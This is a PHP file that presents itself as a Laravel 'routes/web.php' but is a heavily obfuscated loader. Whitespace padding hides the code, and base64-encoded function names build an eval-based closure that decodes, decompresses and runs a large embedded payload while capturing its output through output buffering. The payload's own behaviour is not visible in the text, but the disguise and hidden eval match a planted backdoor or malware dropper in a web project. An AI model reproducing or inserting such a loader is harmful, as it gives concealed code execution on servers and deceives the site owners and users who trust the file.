<?php 
        $__='printf';$_='Loading routes/web.php';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
